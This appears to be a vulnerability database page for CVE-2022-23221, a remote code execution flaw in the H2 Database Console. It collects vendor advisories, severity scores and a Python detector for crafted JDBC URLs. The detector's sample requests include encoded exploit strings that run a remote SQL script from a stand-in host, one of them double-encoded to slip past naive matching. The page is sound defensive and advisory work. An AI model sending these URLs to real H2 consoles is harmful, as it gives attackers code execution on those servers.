CVE-2022-23221
Published: 2022-01-19
Priority: P2 (70) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 64.77% (99.1 percentile)
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | h2database | < 2.1.210-1 (bookworm) | 2.1.210-1 (bookworm) |
| h2database | h2 | >= 1.1.100 < 2.0.206 | 2.0.206 |
| oracle | communications_cloud_native_core_console | — | — |
Detection & IOCs (extracted from sources)
- Indicator (other): jdbc:h2:mem JDBC URL containing IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT
- Detect exploitation attempts by monitoring HTTP requests to the H2 Console for a submitted JDBC connection string containing IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT. The string arrives as a URL-encoded form field, so match after decoding and match case-insensitively.
- The vulnerability is remotely exploitable over HTTP with no authentication required; monitor H2 Console HTTP endpoints for crafted connection URL submissions.
- Flag any JDBC connection URL submitted to the H2 Console that includes the INIT=RUNSCRIPT directive, as this enables remote script execution regardless of which other settings accompany it.
- Only H2 Console versions before 2.1.210 are affected; systems running 2.1.210 or later are not affected.
- This is a distinct vulnerability from CVE-2021-42392, which involves deserialization of untrusted data in H2; both affect H2 but via different attack vectors.
- Exploitation is specifically via the H2 Console interface over HTTP; deployments that do not expose the H2 Console remotely have a reduced attack surface.
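The check described in the detection notes above, written out as an added example for this page (it is not the H2 project's code and does not come from any of the cited sources). It assumes the console's login form posts to a path ending in `login.do` with the connection string in a `url` form field (both assumptions, labelled in the code), decodes the value before matching, and runs over constructed request records rather than captured traffic. It flags both the exact settings chain from the CVE description and any bare INIT=RUNSCRIPT directive.

```python
"""Flag H2 Console login submissions carrying a CVE-2022-23221-style JDBC URL."""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote_plus

# The exact settings chain named in the CVE description.
FULL_CHAIN = re.compile(
    r"IGNORE_UNKNOWN_SETTINGS\s*=\s*TRUE\s*;\s*FORBID_CREATION\s*=\s*FALSE"
    r"\s*;\s*INIT\s*=\s*RUNSCRIPT",
    re.IGNORECASE,
)
# Any INIT=RUNSCRIPT directive at all, whatever else is in the URL.
INIT_RUNSCRIPT = re.compile(r"(?:^|;)\s*INIT\s*=\s*RUNSCRIPT\b", re.IGNORECASE)
H2_JDBC = re.compile(r"jdbc:h2:", re.IGNORECASE)

LOGIN_PATH = "/login.do"  # ASSUMPTION: H2 Console login endpoint name
URL_FIELD = "url"         # ASSUMPTION: form field carrying the JDBC URL


def normalize(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so double-encoded payloads do not slip past."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_jdbc_url(raw: str) -> Optional[str]:
    """Verdict for one candidate JDBC URL: full CVE chain, bare INIT=RUNSCRIPT, or None."""
    url = normalize(raw)
    if not H2_JDBC.search(url):
        return None
    if FULL_CHAIN.search(url):
        return "cve-2022-23221-chain"
    if INIT_RUNSCRIPT.search(url):
        return "init-runscript"
    return None


def scan_request(method: str, path: str, payload: str) -> Optional[dict]:
    """payload is the query string (GET) or the form body (POST) exactly as logged."""
    if not path.endswith(LOGIN_PATH):
        return None
    # Check the decoded `url` field first, then the raw payload as a fallback
    # in case the field name differs behind a proxy or a custom front end.
    candidates = parse_qs(payload, keep_blank_values=True).get(URL_FIELD, [])
    candidates.append(payload)
    for cand in candidates:
        verdict = classify_jdbc_url(cand)
        if verdict:
            return {"method": method, "path": path, "verdict": verdict,
                    "jdbc_url": normalize(cand)[:160]}
    return None


# Constructed request records (method, path, payload); not captured traffic.
SAMPLE_REQUESTS = [
    # Exact chain from the CVE description, single URL-encoding.
    ("POST", "/h2-console/login.do",
     "language=en&driver=org.h2.Driver&url=jdbc%3Ah2%3Amem%3Atest%3BIGNORE_UNKNOWN_SETTINGS"
     "%3DTRUE%3BFORBID_CREATION%3DFALSE%3BINIT%3DRUNSCRIPT+FROM+%27http%3A%2F%2F192.0.2.10"
     "%2Fpoc.sql%27&user=sa&password="),
    # Lower-case, INIT=RUNSCRIPT only, without the two preceding settings.
    ("POST", "/h2-console/login.do",
     "driver=org.h2.Driver&url=jdbc%3Ah2%3Amem%3Ax%3Binit%3Drunscript+from+%27http%3A%2F%2F"
     "192.0.2.10%2Fa.sql%27&user=sa&password="),
    # Same chain, double URL-encoded to evade a single-decode matcher.
    ("POST", "/h2-console/login.do",
     "driver=org.h2.Driver&url=jdbc%253Ah2%253Amem%253Ax%253BIGNORE_UNKNOWN_SETTINGS%253DTRUE"
     "%253BFORBID_CREATION%253DFALSE%253BINIT%253DRUNSCRIPT+FROM+%2527http%253A%252F%252F"
     "192.0.2.10%252Fb.sql%2527&user=sa&password="),
    # Benign embedded-file connection string.
    ("POST", "/h2-console/login.do",
     "driver=org.h2.Driver&url=jdbc%3Ah2%3A~%2Ftest&user=sa&password="),
    # Not a login request at all.
    ("GET", "/h2-console/query.do", "sql=SELECT+1"),
]


def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Run the detector over a batch of request records and return the hits."""
    return [hit for hit in (scan_request(*r) for r in requests) if hit]


if __name__ == "__main__":
    for hit in scan_all():
        print(f"{hit['verdict']:22} {hit['method']} {hit['path']}  {hit['jdbc_url']}")
```

The decode loop is bounded so a pathological value cannot keep the matcher busy, and the raw-payload fallback means a renamed form field still gets inspected at the cost of a wider match surface; tune `LOGIN_PATH` to wherever the console is mounted in your deployment.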
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| ghsa | — | 9.8 | CRITICAL | — |
| osv | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
| vendor_oracle | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
| vendor_ubuntu | — | 9.8 | CRITICAL | — |
Ubuntu
H2 vulnerabilities
vendor_ubuntu·2024-06-13·CVSS 9.8 [CRITICAL]
Advisory indexed under CVE-2021-42392; also covers CVE-2022-23221.
Summary: H2 could be made to allow arbitrary code execution.
It was discovered that H2 was vulnerable to deserialization of
untrusted data. An attacker could possibly use this issue to
execute arbitrary code. (CVE-2021-42392)
It was discovered that H2 incorrectly handled some specially
crafted connection URLs. An attacker could possibly use this
issue to execute arbitrary code. (CVE-2022-23221)
Instructions: In general, a standard system update will make all the necessary changes.
Oracle
Oracle Fusion Middleware Risk Matrix: B2B Engine (H2 Database) — CVE-2022-23221
vendor_oracle·2024-01-15·CVSS 9.8 [CRITICAL]
CVE: CVE-2022-23221
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Attack vector: Network
Advisory: cpujan2024 (JAN 2024)
Oracle
Oracle HealthCare Applications Risk Matrix: Data Studio (H2 Database) — CVE-2022-23221
vendor_oracle·2023-01-15·CVSS 9.8 [CRITICAL]
CVE: CVE-2022-23221
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Attack vector: Network
Advisory: cpujan2023 (JAN 2023)
Oracle
Oracle Communications Risk Matrix: CNC Console (H2) — CVE-2022-23221
vendor_oracle·2022-04-15·CVSS 9.8 [CRITICAL]
CVE: CVE-2022-23221
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Attack vector: Network
Advisory: cpuapr2022 (APR 2022)
Ubuntu
H2 vulnerabilities
vendor_ubuntu·2022-04-05·CVSS 9.8 [CRITICAL]
Advisory indexed under CVE-2021-42392; also covers CVE-2022-23221.
Summary: Several security issues were fixed in H2.
It was discovered that H2 was vulnerable to deserialization of
untrusted data. An attacker could possibly use this issue to
execute arbitrary code. (CVE-2021-42392)
It was discovered that H2 incorrectly handled some specially
crafted connection URLs. An attacker could possibly use this
issue to execute arbitrary code. (CVE-2022-23221)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
h2: Loading of custom classes from remote servers through JNDI
vendor_redhat·2022-01-19·CVSS 9.8 [CRITICAL] · CWE-502
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
A flaw was found in the H2 Console. This flaw allows remote attackers to execute arbitrary code via a JDBC URL, concatenating with a substring that allows remote code execution by using a script.
Statement: In OpenShift Container Platform (OCP) the openshift-enterprise-3.11/metrics-hawkular-metrics-container container image ships a vulnerable version of h2 as part of the underlying images, but as it uses standard configuration and Console is not enabled/started by default, therefore the
Debian
CVE-2022-23221: h2database - H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via ...
vendor_debian·2022·CVSS 9.8 [CRITICAL]
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
Scope: local
bookworm: resolved (fixed in 2.1.210-1)
bullseye: resolved (fixed in 1.4.197-4+deb11u1)
forky: resolved (fixed in 2.1.210-1)
sid: resolved (fixed in 2.1.210-1)
trixie: resolved (fixed in 2.1.210-1)
OSV
h2database vulnerabilities
osv·2022-04-05·CVSS 9.8 [CRITICAL]
Advisory indexed under CVE-2021-42392; also covers CVE-2022-23221.
It was discovered that H2 was vulnerable to deserialization of
untrusted data. An attacker could possibly use this issue to
execute arbitrary code. (CVE-2021-42392)
It was discovered that H2 incorrectly handled some specially
crafted connection URLs. An attacker could possibly use this
issue to execute arbitrary code. (CVE-2022-23221)
OSV
Arbitrary code execution in H2 Console
osv·2022-01-21·CVSS 9.8 [CRITICAL]
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
GHSA
Arbitrary code execution in H2 Console
ghsa·2022-01-21·CVSS 9.8 [CRITICAL] · CWE-88
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
OSV
CVE-2022-23221: H2 Console before 2
osv·2022-01-19·CVSS 9.8 [CRITICAL]
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
No detection rules found.
No public exploits indexed.
Qualys
Oracle Patch Update, January 2024 Security Update Review
blogs_qualys·2024-01-17
Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Oracle has released its first quarterly edition of Critical Patch Update, which contains patches for 389 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in a wide range of product families, including Oracle code and third-party components included in Oracle products.
In the first quarterly Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of patches, 71, constituting 18% of the total patches released. Oracle Communications and Oracle Communications Applications follow
Bugzilla
CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI
bugzilla·2022-01-24·CVSS 9.8 [CRITICAL]
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
https://github.com/h2database/h2database/security/advisories
https://github.com/h2database/h2database/releases/tag/version-2.1.210
https://twitter.com/d0nkey_man/status/1483824727936450564
Discussion:
This issue has been addressed in the following products:
Red Hat JBoss Enterprise Application Platform
Via RHSA-2022:4922 https://access.redhat.com/errata/RHSA-2022:4922
References
- http://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2022/Jan/39
- https://github.com/h2database/h2database/releases/tag/version-2.1.210
- https://github.com/h2database/h2database/security/advisories
- https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html
- https://security.netapp.com/advisory/ntap-20230818-0011/
- https://twitter.com/d0nkey_man/status/1483824727936450564
- https://www.debian.org/security/2022/dsa-5076
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://www.oracle.com/security-alerts/cpujul2022.html